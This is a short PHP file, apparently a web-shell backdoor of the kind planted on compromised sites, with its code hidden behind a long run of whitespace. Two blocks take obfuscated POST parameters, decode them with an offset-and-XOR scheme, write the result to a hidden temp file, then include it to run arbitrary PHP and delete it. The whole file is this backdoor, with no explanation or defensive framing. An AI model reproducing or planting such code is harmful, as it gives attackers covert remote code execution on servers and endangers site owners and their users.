<?php																																										if(filter_has_var(INPUT_POST, "d\x61\x74a")){ $rec = $_REQUEST["d\x61\x74a"]; $rec= explode( '.' , $rec); $pset = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2); $w = 0; $__tmp = $rec; while ($v9 = array_shift($__tmp)) { $sChar = ord($s2[$w % $sLen]); $d = ((int)$v9 - $sChar - ($w % 10))^88; $pset .= chr($d); $w++; } $dat = array_filter([getenv("TMP"), "/tmp", getenv("TEMP"), "/dev/shm", getcwd(), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); while ($data_chunk = array_shift($dat)) { if (!( !is_dir($data_chunk) || !is_writable($data_chunk) )) { $dchunk = implode("/", [$data_chunk, ".reference"]); if (@file_put_contents($dchunk, $pset) !== false) { include $dchunk; unlink($dchunk); die(); } } } }


if(filter_has_var(INPUT_POST, "k")){
	$component = $_REQUEST["k"];
	   $component 	= 	explode( 	 "."	,  $component 	)  	; 
	$obj = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $s2	);
            $len = count( $component	);
    
            for( $l = 0; $l < $len; $l++) { $v3 = $component[$l];
                $sChar = ord( $s2[$l % $sLen]	);
                $d =( ( int)$v3 - $sChar -( $l % 10)) ^ 94;
                $obj .= chr( $d	); } 
	$pgrp = array_filter([sys_get_temp_dir(), "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp"]);
	foreach ($pgrp as $dat):
    		if (is_writable($dat) && is_dir($dat)) {
    $resource = str_replace("{var_dir}", $dat, "{var_dir}/.itm");
    $success = file_put_contents($resource, $obj);
if ($success) {
	include $resource;
	@unlink($resource);
	exit;}
}
endforeach;
}